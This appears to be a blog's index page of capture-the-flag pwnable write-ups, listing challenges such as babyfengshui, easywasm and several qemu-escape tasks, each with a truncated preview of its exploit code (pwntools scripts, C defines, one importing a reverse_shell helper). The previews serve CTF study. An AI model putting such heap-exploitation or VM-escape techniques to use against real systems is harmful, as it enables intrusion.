33C3 CTF - babyfengshui
·
CTF/2016
Category : pwnable Summary : heap overflow Exploit#!/usr/bin/python from pwn import * def cmd_add(alloc_size, input_size, name, data): ru('Action') sl(str(0)) ru('size of description: ') sl(str(alloc_size)) ru('name: ') sl(name) ru('text length: ') sl(str(input_size)) ru('text: ') sl(data) def cmd_del(idx): ru('Action') sl(str(1)) ru('index: ') sl(str(idx)) def cmd_show(idx): ru('Action') sl(str..
BCTF 2018 - easywasm
·
CTF/2018
Category : pwnable Summary : wasm, bof, trigger function table index oob Exploit #!/usr/bin/python from pwn import * from paul45 import reverse_shell import requests as r URL = 'http://0:23333' def add_person(name, is_tutor): res = r.get(URL + '/add_person', params={'name':name, 'is_tutor':is_tutor}).text idx = int(res[len('create person done, person id = &#39..
SECCON CTF 2018 QUAL - CLV2
·
CTF/2018
Category : pwnable CLV24893 SolvesPwn me, and Prove yourself nc clv2.pwn.seccon.jp 31337 Summary : tcache, use after free Exploit#!/usr/bin/python from pwn import * def cmd_register(name): ru('[E]xit\n') sl('R') ru('name?\n') sl(name) return rl(False).split(' ')[0] def cmd_login(name): ru('[E]xit\n') sl('L') ru('User : ') sl(name) def cmd_play(): ru('[E]xit\n') sl('P') def cmd_add_prov(method, w..
DEFCON CTF 2018 QUAL - EC3
·
CTF/2018
Category : pwnable Summary : qemu escape Exploit#include #include #include #include #include #include #include #include #include #define OOO_ALLOCATE 0x000000 #define OOO_FREE 0x100000 #define OOO_WRITE 0x200000 #define MAP_SIZE 0x1000000 #define OOO_BIN_BASE 0x1317940 #define FREE_GOT 0x11301a0 #define OOO_MAGIC_GADGET 0x6e65f9 int fd; char *mmio; uint64_t ooo_read(uint32_t idx, uint32_t offset..
0CTF 2017 FINAL - VM Escape
·
CTF/2017
Category : pwnable Summary : qemu escape Exploit #include #include #include #include #include #include #include #include #include #include #define IOMEM_A 0xfe900000 #define IOMEM_B 0xfea00000 #define IOPORT_A 0xc000 #define IOPORT_B 0xc100 #define MMIO_SRC 0x04 #define MMIO_DST 0x08 #define MMIO_COPY 0x20 #define MMIO_CMD 0x24 #define MMIO_TIMER 0x80 #define MMIO_EXPIRE_LO 0x88 #define MMIO_EXP..
HITB GSEC 2017 - babyqemu
·
CTF/2017
Category : pwnable Summary : qemu escape Exploit #include #include #include #include #include #include #include #include #include #include #define SRC_LO 0x80 #define SRC_HI 0x84 #define DST_LO 0x88 #define DST_HI 0x8c #define CNT 0x90 #define TIMER 0x98 #define TIMER_READ 0x1 #define TIMER_WRITE 0x3 #define TIMER_ENC 0x4 #define MAP_SIZE 0x1000 #define PAGE_SHIFT 12 #define PAGE_SIZE (1 enc = s..
BCTF 2018 - houseOfAtum
·
CTF/2018
Category : pwnable Summary : uaf, tcache, show function, confusion between tcache and fastbin, 2 notes Exploit#!/usr/bin/python from pwn import * def cmd_add(data): ru('Your choice:') ss('1\x00') ru('Input the content:') ss(data) ru('Done!\n') def cmd_edit(idx, data): ru('Your choice:') ss('2\x00') ru('Input the idx:') ss(str(idx)+'\x00') ru('Input the content:') ss(data) ru('Done!\n') def cmd_d..
SECCON CTF 2018 QUAL - secret_message (one shot exploit)
·
CTF/2018
Category : pwnable secret_message 494 2 Solves Let's share a secret with us nc secret-message.pwn.seccon.jp 31337 (Hint: We allow a "little" bruteforcing to secret_message only.)Summary : ascii art, out of boundary, double staged format string attack, * precision, fread, fwrite Off by one 취약점으로 해겨해야 하는줄 알고 초반에 방향 잘못 잡았던 문제. fsb 로 취약점으로 풀이가능하다. 문제 description에서 "little" brute force를 허용해주는 것으로..

티스토리툴바